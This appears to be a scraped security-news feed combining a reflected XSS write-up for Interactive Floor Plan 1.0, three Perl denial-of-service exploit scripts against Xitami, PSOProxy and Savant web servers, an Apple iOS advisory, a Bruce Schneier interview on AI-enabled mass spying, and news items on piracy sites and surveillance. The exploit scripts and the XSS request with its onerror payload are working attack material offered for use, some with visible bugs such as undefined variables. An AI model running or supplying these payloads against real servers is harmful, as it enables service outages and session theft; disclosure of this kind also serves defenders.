Interactive Floor Plan version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Interactive-Floor-Plan-1.0-XSS-Reflected-SESSION-Hijacking## Author: nu11secur1ty## Date: 01/28/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/interactive-floor-plan-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the action request parameter is copied into the HTMLdocument as plain text between tags. The payload epe7x<img src=aonerror=alert(1)>aagqb was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal session cookies etc.STATUS: HIGH - Vulnerability[+]Exploit:```GETGET /1706426767_110/index.php?controller=pjFront&action=pjActionLoadCssepe7x%3cimg%20src%3da%20onerror%3dalert(1)%3eaagqbHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.809339229.1706427310;_gid=GA1.2.1556395590.1706427310; _gat=1;_fbp=fb.1.1706427309936.1280956215;_ga_NME5VTTGTT=GS1.2.1706427311.1.0.1706427311.60.0.0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Interactive-Floor-Plan-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/interactive-floor-plan-10-xss-reflected.html)## Time spent:00:35:00

Interactive Floor Plan 1.0 Cross Site Scripting

Senior Privacy Advocate David Ruiz speaks with Bruce Schneier about artificial intelligence, surveillance, and an era of "mass spying."

For decades, governments and companies have surveilled the conversations, movements, and behavior of the public.

And then the internet came along and made that a whole lot easier.  

Today, search engines collect our queries, browsers collect our device information, smartphones collect out locations, social media platforms collect our conversations with one another, and, depending on the country, governments either collect that same information from the companies that maintain it, or they gather it directly themselves by monitoring their people.

That’s a lot of data that, until now, has been difficult to parse at scale.

But cryptographer and computer security professional Bruce Schneier believes that’s going to change, all because of the advent of artificial intelligence.

Already equipped with reams of data, governments and companies will now be able to ask AI models to make conclusions _from_ the data, Schneier said, supercharging the human work of inquiry with the limitless scale of AI.

“Spying is limited by the need for human labor,” Schneier wrote. “AI is about to change that.”

In January, Senior Privacy Advocate David Ruiz (and host of the Lock and Code podcast) spoke with Schneier about the future of AI-enabled mass spying—the implications, the responses from the public, and whether there’s any hope in dismantling a system so deeply embedded in the modern world.

Below is an edited transcript of their conversation.

**DAVID RUIZ**: We know that mass surveillance has this “Collect it all” mentality—of the NSA, obviously, but also from companies that gather clicks and shares and locations and app downloads and all of that.

What is the mass spying equivalent of that?

**BRUCE SCHNEIER**: So, it’s “Collect it all,” but it’s “Collect different things.”

Let’s step back here.

We kind of know what mass surveillance, mass spying looks like. It’s the kind of thing we saw in former East Germany, where like 10 percent of the population spied on 90 percent of the population. And it was incredibly manpower intensive.

Now, we moved into a world of automatic mass surveillance with the rise of the internet and the rise of cheap data storage and processing. This is maybe 20 years ago, when companies and the NSA start collecting mass surveillance data, and that is metadata—the kind of data that Snowden talked about—data about data. Data from your phone, from your browser, who you spoke to, where you went, what you spent money on, what websites you visited, that’s kind of mass surveillance data.

> Spying, the difference I’m making, is about conversations.

And while computers were easily able to interpret location data and data about who you spoke to—your email “from” and “to” lines—they weren’t able to interpret what you said.  Voice conversations, text conversations, email conversations, they could do keyword searches and if you think about, Chinese censorship is based pretty naively on keyword searches. \[For instance,\] you say the bad word, you get censored. That’s still very primitive.

Spying—listening in on a conversation, knowing what people are saying—required human beings, and there weren’t enough humans to listen to everything. So, you had this automatic surveillance: We can know where everybody is, that’s easy.  But knowing what everybody’s saying, we still couldn’t do—we didn’t have the people.

As AI becomes increasingly capable of understanding and even having conversations, it can start doing the role that people used to do and engage in this kind of spying at a mass level.

Now, the question you asked started me in this monologue is what did that look like? And the answer is: We have no idea.

We kind of know what East Germany looked like, former Soviet Union. We do know what some of these countries look like. But I don’t think it’s the same. It is not this kind of mass spying by corporations. Or by democratic governments. So, we don’t know. But it’s worth at least thinking about. 

**DAVID RUIZ**: When I was trying to answer my own question, I feel like one of the potential futures here is, instead of “Collect it all,” it’s this attempt at “Know it all.”

**BRUCE SCHNEIER**: It always was “Know it all,” but now it becomes more possible.

**DAVID RUIZ**: Yeah, and I was hypothesizing that there might be companies that say “We have created a package of questions that we use on AIs that we know and trust to discover these new insights,” and \[they\] sell these packages to companies that are trying to find out XYZ and ABC about their customers, or governments about their persons.

And that already sounds awful. It sounds both boring and dreadful, which is what I think surveillance is today—it is boring operationally in terms of \[how\] we don’t see data brokers. We don’t see what gets collected every single day behind the interface of the web. But it is used so much to power the direction of the web.

**BRUCE SCHNEIER**: And my guess is that’s right. And it’s not actually boring. Certainly, the companies wanted you to think that. It is very hidden. Data brokers spent a lot of effort making sure that there’s no visibility into their industry, so we don’t know the data being collected on us.

But remember, this is still all surveillance data. It’s not the contents of your phone calls, it’s the billing information. It’s who you called, what time, how long you spoke, that kind of information. Maybe the location of your two phones when you were talking. This brings it up to another level. 

**DAVID RUIZ**: You mentioned that this is the conversations—the content of communications. And I wanted to address that immediately because I think whenever spying is discussed, a lot of folks picture someone rifling through text messages or emails. And I think some people might balk at that. They might say and reject the premise based on things like “Oh, Apple can’t look at my iMessages, and Google said it wouldn’t advertise based on email content some years ago, and my phone provider, I don’t think, is recording my phone calls.”

So, my question after those kinds of claims, is: Is that too narrow a lens to understand this future of mass spying? What am I missing when I say those things to calm myself down?

**BRUCE SCHNEIER**: I think it’s all economics. Google did realize that eavesdropping on the contents of your Gmail wasn’t terribly useful. So, they didn’t do it. Of course, they made a virtue out of it. That stuff will change.

We’re already seeing \[the questions of\] “Is this company using your data to train their AI? Will it be used to influence how an AI interacts with you?”\[And\] already we can see that the tones of voice we use with these AI chatbots is mirrored. They say they’re not storing it and using it for training—we don’t know the answer.

As this stuff becomes more valuable, as companies see a business interest in using it, of course it’s going to be used. It’s not going to be a world where we \[can\] rely on the goodness of the hearts of for-profit corporations not to abuse our privacy.

So, it’s a matter of how cheap it is. It is going to become cheap for Google to eavesdrop on the contents of everyone’s email conversations, or for Zoom to eavesdrop on all meetings? They currently say they’re not \[monitoring meetings in\] their terms of service, they’ll probably \[receive\] push back if they change it—they were already pushed back because there was a thought that Zoom would be using your information to train an AI. \[It\] turned out to not be true, but there was a little panic there. But how long does that last? 

We saw this with Facebook and their surveillance over the years and decades.

They did a new thing, there was a pushback, there’s an outcry, and after a couple months, it was the new normal. So, I don’t know where this is going to go, but the tech is moving to the point where this stuff is possible and, in fact, easy. 

**DAVID RUIZ**: We talked about the business case for \[AI-enabled mass spying\] and I wanted to ask more broadly: Who will engage in AI mass spying?

**BRUCE SCHNEIER**: The answer is going to be everybody who can.

Who are the major players here? Certainly there are corporations who are doing it for manipulation purposes. Surveillance is the business model of the internet because advertising is the business model of the internet, and advertising is convincing you to do something that you might not have done otherwise.

So, this surveillance-based manipulation is the business model, and anything that gives a company an advantage, they’re going to do. We \[already\] saw that with personalized advertising \[which is\] based on characteristics that you might not be happy sharing.

So, companies will do that.

Now, in the West, we tend not to have governments do this on their own citizens—they rely on corporations. The US government doesn’t spy on us directly, they get the spying data from corporations who do that to everybody.

You go to other countries, more totalitarian countries, and governments do engage in surveillance and will engage in spying. Here, I’m thinking about China, but other countries as well. So, very much think of it in terms of power:

> Those that have the power will engage in the behaviors because it magnifies their power. There is no surprise. 

**DAVID RUIZ**: There’s a lot of times where we could think “Why would a company do this? Why would a government do this?” And there’s a lot of alleged reasons. The NSA will say that it collects as much data as possible for national security reasons, but they’ve been saying that for decades, and the national security reason seems to change every few years, right? There’s a, there’s a “national security risk du jour.”

And it’s much easier and simpler to think of it as those that have power hope to keep that power and amass more of it.

I wanted to separately ask: We talked about corporations. We talked about governments. What about people? I have access to AI tools in a way that I don’t have access to data collection regimes.

So, are people going to spy on people?

**BRUCE SCHNEIER**:  People are already spying on people. It’s more one-on-one. There’s an entire industry of super creepy spyware that is sold to people who want to spy on their wives and girlfriends. This is kind of a gross industry, but it exists and it is used in many countries.

So, yes. But here again, the power matters, and it’s generally the more powerful spying on the less powerful in a relationship. It’s generally the man spying on the woman because that’s the power imbalance.

When you think about bulk surveillance, it’s access to the data.

I really can’t spy on my neighborhood. Sure, I can set up a camera in front of my house and watch what’s going on in my street, but that’s all I could do. I don’t have the power to put cameras everywhere. I don’t have the power to get your email or your Zoom stream.

So, I think you are going to see some use of these technologies by people who are not traditionally powerful. But in general, like all these technologies, they benefit the powerful more than the less powerful.

**DAVID RUIZ**: We know that people act differently when they know they’re being surveilled—will that also apply to mass spying?

**BRUCE SCHNEIER**: Certainly, people in the United States have lived out of this kind of regime in post-9/11. Lots of Muslims lived in a world where they were being spied on a lot.

Lots of people—Jon Penney comes to mind, there are others—have researched how the feeling that you’re under constant surveillance—or spying, they’re both the same here—leads to self-censorship.

If you think you are being watched all the time, you behave differently. We do know that there’s an enormous chilling effect on how you behave, what you do, on your conformity. And if you think you’re being watched all the time, you tend to conform. You’re not going to do something different. You’re not going to stand out.

> This seems really bad for society because that’s how society innovates. A world where people don’t try new things is a world that stagnates.

To take an easy example, about 10 years ago, I forget the year, gay marriage became legal in the United States, in all 50 states. It became the law of the land and that change was the result of a multi-decade process. For a while it was illegal and immoral, then it was illegal and moral, and then it became legal and moral.  And in order for that to happen—in order for that whole progression—somebody way back in the beginning had to try gay sex once and say: “You know, that wasn’t so bad. That was kind of fun.”

And the reason they were able to do that is that they weren’t being watched. They could do it in the privacy of their own bedroom and no one could stop them.

If you live in a world where, whether it’s gay sex or marijuana or whatever it is that becomes the mainstream moral norm over several generations, if you can’t try it, if there can’t be a counterculture of doing it, it never will become the social norm. If everybody who tried pot in the ‘50s was immediately discovered and arrested, you’d never get to legalization. You never would get a generation of people that would say, “You know, that’s not that bad. Why are we criminalizing this kind of not harmful drug?”

**DAVID RUIZ**: On the current environment that we live in, where so much surveillance happens every day—again, both from corporations and from governments—it doesn’t seem like there’s any way to dismantle it. And it feels like the potential of mass spying to produce even deeper insights means that we’ve lost the battle on surveillance. Have we lost that battle?

**BRUCE SCHNEIER**: I never think it’s too late, and that kind of fatalism doesn’t make sense when you look at history. It’s like saying in the 1200s, “Well, we tried to fight against monarchy. I guess that didn’t work. It’s too late.” Or centuries later, “You know, we tried to fight against slavery, that didn’t work.” Or, “You know, we’ll never give women the vote. That ship has sailed.”

> We, as a species, regularly make our society more moral, more ethical, more egalitarian. It’s slow, it’s bursty, but decade over decade, century over century, we are improving.

So, no, I don’t think from now until the end of our species, the level of surveillance we see today cannot be rolled back. I think that is ridiculous.

We no longer send five-year-olds up chimneys to clean them. We don’t do that. We changed. We no longer allow companies to sell pajamas that catch on fire. We changed. We can do that here.

Like the other big things, like monarchy, like slavery, like the patriarchy, these things are going to be hard to dismantle, but they are dismantlable.

Near term, I think you’re right. Near term, both companies and governments are just punch-drunk on our data, and they’re not going to give it up. But long term, lots of things are possible and will happen. 

**DAVID RUIZ**: I mean this as a high compliment: You are the most optimistic guest we’ve had on the podcast.

**BRUCE SCHNEIER**: I’m near term pessimistic and long term optimistic. Near term, I think we’re screwed. The tech monopolies are so powerful, and we saw that with social media. Both Republicans and Democrats agreed—this never happened before—that Facebook was harming our society in different ways, but it’s harming society. \[They\] called Zuckerberg in, called the other companies in, yelled at them, \[said\] something must be done, and nothing was done.

That is sheer lobbying power right there in operation.

So, near term, I don’t see any solution, but our species has handled harder problems than this. This won’t be the one that stumps us.

**DAVID RUIZ**: What do we do at this point? 

**BRUCE SCHNEIER**: I want this to be a political issue. This stuff changes when it becomes an issue that voters care about. If there is a debate question on this, if this becomes something that politicians are asked about, then change will happen, right? If it isn’t, then it is really just the lobbyists that get to decide what happens.

“What should we do?” is agitate for change. Make this political, make this something that politicians can’t ignore.

Where change is happening is the EU. You have listeners in the EU, and they will know that things are happening there. Right now, Europe is the regulatory superpower on the planet. They are the jurisdiction where we got a comprehensive data privacy law, where they are passing an AI security law, stuff that you would never see in the United States.

So, look outside the US right now, but make this political. That’s how we’re going to make it better.

But we’re fighting uphill. It’s very hard in the United States to enact policies that the money doesn’t want. Money gets its way in in US policy. And the money wants this. 

**DAVID RUIZ**: And I think disentangling money from politics in the United States is a different \[conversation\], and unfortunately we don’t have the time for it.

**BRUCE SCHNEIER**: No, surely you can solve that in half an hour.

**DAVID RUIZ**: Actually, are you booked for the next half hour?

**BRUCE SCHNEIER**: If I was able to solve that, I would be not doing what I’m doing now, because, you’re right, that might not be the most important problem, but as Professor Larry Lessig said, it’s the first problem. It’s a problem we need to solve to solve every other problem.

 In conversation: Bruce Schneier on AI-powered mass spying 

Xitami version 2.5b4 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Xitami 2.5b4 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 29 january 2024  
# Vendor Homepage: https://imatix-legacy.github.io/xitami.com/  
# Download to demo: https://drive.google.com/file/d/1hOVDRvk0KlZbHM4HeNhvhlbETbmQVEsf/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Xitami 2.5b4   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=Sxe6HIhAl4A

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to webserver.  
#The following request sends a large amount of data to the webserver to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

    $exploit  = "A"*939;

if ($socket = IO::Socket::INET->new  
   (PeerAddr => $ip,  
   PeerPort => $port,   
   Proto => "TCP"))

       {   
    $header =  
    "GET / HTTP/1.1\r\n".  
    "Host: ".$target." \r\n".  
    "If-Modified-Since: AAAAAAAAAAAAA "." $exploit\r\n";

    print $socket $header."\r\n";  
    sleep(1);  
    close($socket);  
    }

else  
  {  
  print "[-] Connection to $target failed!\n";  
  } 

            print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Xitami 2.5b4 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Xitami 2.5b4 Denial Of Service

PSOProxy version 0.91 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: PSOProxy 0.91 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 28 january 2024  
# Vendor Homepage: https://sourceforge.net/projects/psoproxy/files/latest/download  
# Download to demo: https://drive.google.com/file/d/1O8Q2d0muet6XuOhqwXuvT3qfzgGNk6vs/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: PSOProxy 0.91  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=ALe3uFS4cUA

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to web server.  
#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

my $i=0;  
    print "\t    ==> Exploiting... \n\n";

$socket = IO::Socket::INET->new  
     (PeerAddr => $ip,  
      PeerPort => $port,  
      Proto => "tcp")  
{  
        $header =  
        "GET / HTTP/1.1\r\n".  
        "Host: ".$ip." \r\n".  
        "Connection:".$exploit."\r\n";

        print $socket $header."\r\n";  
        sleep(1);  
        close($socket);  
}

 else  
{  
    print "[-] Connection to $target failed!\n";  
    exit;  
}

print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

                              ,--,  
                       _ ___/ /\|  
                   ,;'( )__, )  ~  
                  //  //   '--;   
                  '   \     | ^  
                       ^    ^

      [+] PSOProxy 0.91 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

PSOProxy 0.91 Denial Of Service

Savant version 3.0 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: Savant 3.0 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 27 january 2024  
#https://sourceforge.net/projects/savant/files/Savant/3.0/Savant30.exe/download  
# Download to demo: https://drive.google.com/file/d/18m_wzC8EOSB8lHPc1DexpOfsDm7H8RFs/view?usp=sharing      
# Notification vendor: No reported  
# Tested Version: Savant 3.0 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The web server does not correctly handle the amount of data or bytes sent to command RNTO.  
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $sc = "\x90" x 245;

    my $buf = "\x41\x41" . " /" . $sc."\r\n\r\n";

my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $por, Proto => 'tcp') or exit;  
$s->send($buf);  
close $s;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] Savant 3.0 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Savant 3.0 Denial Of Service

Apple Security Advisory 01-22-2024-4 - iOS 15.8.1 and iPadOS 15.8.1 addresses code execution and out of bounds read vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-01-22-2024-4 iOS 15.8.1 and iPadOS 15.8.1iOS 15.8.1 and iPadOS 15.8.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT214062.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.WebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch(7th generation)Impact: Processing web content may disclose sensitive information. Appleis aware of a report that this issue may have been exploited againstversions of iOS before iOS 16.7.1.Description: An out-of-bounds read was addressed with improved inputvalidation.WebKit Bugzilla: 265041CVE-2023-42916: Clément Lecigne of Google's Threat Analysis GroupWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch(7th generation)Impact: Processing web content may lead to arbitrary code execution.Apple is aware of a report that this issue may have been exploitedagainst versions of iOS before iOS 16.7.1.Description: A memory corruption vulnerability was addressed withimproved locking.WebKit Bugzilla: 265067CVE-2023-42917: Clément Lecigne of Google's Threat Analysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.8.1 and iPadOS 15.8.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDd8ACgkQX+5d1TXaIvrnYQ//eEhI4dYnq+om+sw4N+fNEcTZWLtBe3GyWgzVtBuvWOwt0Z34BNfVD4jFz1YlzYp18bzYTCdThkIrvQSe/QmYEmdKt16RtQH3qJTyE18h2YLG31gA/ja8iPcNAdqQqz6tJEq9aUrmeyAhFNsEZX7PHVfuSigqi8495rMcN1xI6caCS7Tio98EVmNe6cMRLUefSJH0z5GvwjbTgLCKbhv+/pDAq0L8Lqosy9CFS+oMRYyCdXoPL3E2wOpdnxVgjctp6YJrjT/LFdeT8e3gu6oOo/Pj+bx9RWP8vVS0jos5DXOJJAnLn3qOt9yStqmECBpque3L3PrhToPdSCiIFE8JbHFBWscO/TaF3rQvmZfLSx+HKJR8VSAjpGThjLHWAQUFUauoQ1TudmtA3y9rolCkvhMeZXvbi0dxkEgRtBCbJzRWfMQ6rPeOOkgUUSBkVM/O55bhQ1JqmpUBq2s4lCx6EErwSm1XS6ooXxZt9FWltqhu+ixgne63X8U5+cLJlkRWjeIC63pziGkB6RbIQkupEanrbH8ekRFQs4zIazq1fjZANRN71y+wAZZ5tcbvH37FzUPT7HL9ZPMO8wvVVFEEHNx4RIB+KNSH2E/z67Jhs9nM1atUNg1djufg/mmAfx/83pQretb4xqiN6VKJdPCY/BXkWhBJbdWUpqsODUmfvY0==wSSi-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-4

By Waqas
Soap2day: From Ashes to Pixels - The Curious Case of a Streaming Phoenix.
This is a post from HackRead.com Read the original post: New Soap2day Domains Emerge Despite Legal Challenges

Soap2day permanently shut down in June 2023 – While the official site and its major mirror sites closed down, it seems like some copycats or imitators have emerged using new domains to offer similar illegal streaming services.

Soap2day, the once-infamous haven for free movie and TV show streaming, met its apparent demise in June 2023. Legal pressure and a barrage of copyright infringement takedowns seemingly snuffed out the life of this unauthorized streaming giant. But just like a phoenix rising from the ashes, Soap2day has begun to flicker back to life under new guises, leaving users and authorities alike scratching their heads.

The original Soap2day was a hydra of sorts, with countless mirror sites popping up as fast as the old ones were shut down. This online game of whack-a-mole frustrated content creators and copyright holders for years. However, a coordinated takedown effort in mid-2023 seemed to deal a decisive blow, leaving behind a digital graveyard of dormant URLs.

This was the goodbye message from Soap2day (Screenshot credit: Hackread.com)

But death, it seems, can be temporary in the ever-evolving web. New domains bearing the Soap2day name have started surfacing, offering the same illicit library of movies and TV shows.

These digital doppelgangers appear disconnected from the original operators, possibly opportunistic copycats eager to fill the void left in the streaming underworld. Some of these new domains, like **Soap2day.rs**, **Soap2day.day**, and **Soap2day.store**, are easily accessible through Google. They offer access to thousands of recently released content for free.

The screenshot shows 2 of the new Soap2day domains currently online (Screenshot credit: Hackread.com)

However, there is no such thing as a free lunch. Online streaming services are infamous for phishing users or even dropping malware through pop-up bombardment. The risks are far greater than the potential benefits, making it not worth it. Therefore, engaging with these copycat sites exposes users to a plethora of dangers, including:

*   **Privacy violations:** Dodgy data practices are often rampant on such sites, putting your online privacy at risk.
*   **Malware and phishing attacks:** Disguised software installs and fraudulent links can lurk within these illegal platforms, jeopardizing your device and personal information.
*   **Legal repercussions:** Accessing copyrighted content illegally can lead to hefty fines and legal consequences in many countries.

So, why take the risk when a plethora of legal alternatives exist? Streaming platforms like Netflix, Hulu, and Disney+ offer vast libraries of content for a reasonable price. Additionally, numerous free, legal options like Tubi TV and Crackle provide access to movies and TV shows without compromising your security or wallet.

Here is a detailed list of legal and free online streaming services for movies and TV shows. Remember, using legal platforms not only ensures a safer and more reliable experience but also supports the entertainment industry and content creators.

The Soap2day saga highlights the ephemeral nature of illegal streaming sites. Their days are numbered, yet copycats will always appear, and the risks associated with them far outweigh the fleeting satisfaction of pirated content. Choose legal and safe alternatives, and enjoy your favourite shows and movies with peace of mind.

1.  **Streaming site 123movies has been shut down**
2.  **Fake streaming sites using Star Wars as bait to spread malware**
3.  **Poker player jailed for illegal video streaming, downloading sites**
4.  **Adult streaming site CAM4 leaks 7 TB of data with 11 billion records**
5.  **Police shut down illegal video streaming app Mobdro with 100M users**
6.  **US COVID-19 relief bill to make copyrighted content streaming a felony**

New Soap2day Domains Emerge Despite Legal Challenges

Plus: North Korean hackers get into generative AI, a phone surveillance tool that can monitor billions of devices gets exposed, and ambient light sensors pose a new privacy risk.

Police took a digital rendering of a suspect's face, generated using DNA evidence, and ran it through a facial recognition system in a troubling incident reported for the first time by WIRED this week. The tactic came to light in a trove of hacked police records published by the transparency collective Distributed Denial of Secrets. Meanwhile, information about United States intelligence agencies purchasing Americans' phone location data and internet metadata without a warrant was revealed this week only after US senator Ron Wyden blocked the appointment of a new NSA director until the information was made public. And a California teen who allegedly used the handle Torswats to carry out hundreds of swatting attacks across the US is being extradited to Florida to face felony charges.

The infamous spyware developer NSO Group, creator of the Pegasus spyware, has been quietly planning a comeback, which involves investing millions of dollars lobbying in Washington while exploiting the Israel-Hamas war to stoke global security fears and position its products as a necessity. Breaches of Microsoft and Hewlett-Packard Enterprise, disclosed in recent days, have pushed the espionage operations of the well-known Russia-backed hacking group Midnight Blizzard back into the spotlight. And Amazon-owned Ring said this week that it is shutting down a feature of its controversial Neighbors app that gave law enforcement a free pass to request footage from users without a warrant.

WIRED had a deep dive this week into the Israel-linked hacking group known as Predatory Sparrow and its notably aggressive offensive cyberattacks, particularly against Iranian targets, which have included crippling thousands of gas stations and setting a steel mill on fire. With so much going on, we've got the perfect quick weekend project for iOS users who want to feel more digitally secure: Make sure you've upgraded your iPhone to iOS 17.3 and then turn on Apple's new Stolen Device Protection feature, which could block thieves from taking over your accounts.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

After first disclosing a breach in October, the ancestry and genetics company 23andMe said in December that personal data from 6.9 million users was impacted in the incident stemming from attackers compromising roughly 14,000 user accounts. These accounts then gave attackers access to information voluntarily shared by users in a social feature the company calls DNA Relatives. 23andMe has blamed users for the account intrusions, saying that they only occurred because victims set weak or reused passwords on their accounts. But a state-mandated filing in California about the incident reveals that the attackers started compromising customers’ accounts in April and continued through much of September without the company ever detecting suspicious activity—and that someone was trying to guess and brute-force users' passwords.

North Korea has been using generative artificial intelligence tools “to search for hacking targets and search for technologies needed for hacking,” according to a senior official at South Korea's National Intelligence Service who spoke to reporters on Wednesday under the condition of anonymity. The official said that Pyongyang has not yet begun incorporating generative AI into active offensive hacking operations but that South Korean officials are monitoring the situation closely. More broadly, researchers say they are alarmed by North Korea's development and use of AI tools for multiple applications.

The digital ad industry is notorious for enabling the monitoring and tracking of users across the web. New findings from 404 Media highlight a particularly insidious service, Patternz, that draws data from ads in hundreds of thousands of popular, mainstream apps to reportedly fuel a global surveillance dragnet. The tool and its visibility have been marketed to governments around the world to integrate with other intelligence agency surveillance capabilities. “The pipeline involves smaller, obscure advertising firms and advertising industry giants like Google. In response to queries from 404 Media, Google and PubMatic, another ad firm, have already cut-off a company linked to the surveillance firm,” 404's Joseph Cox wrote.

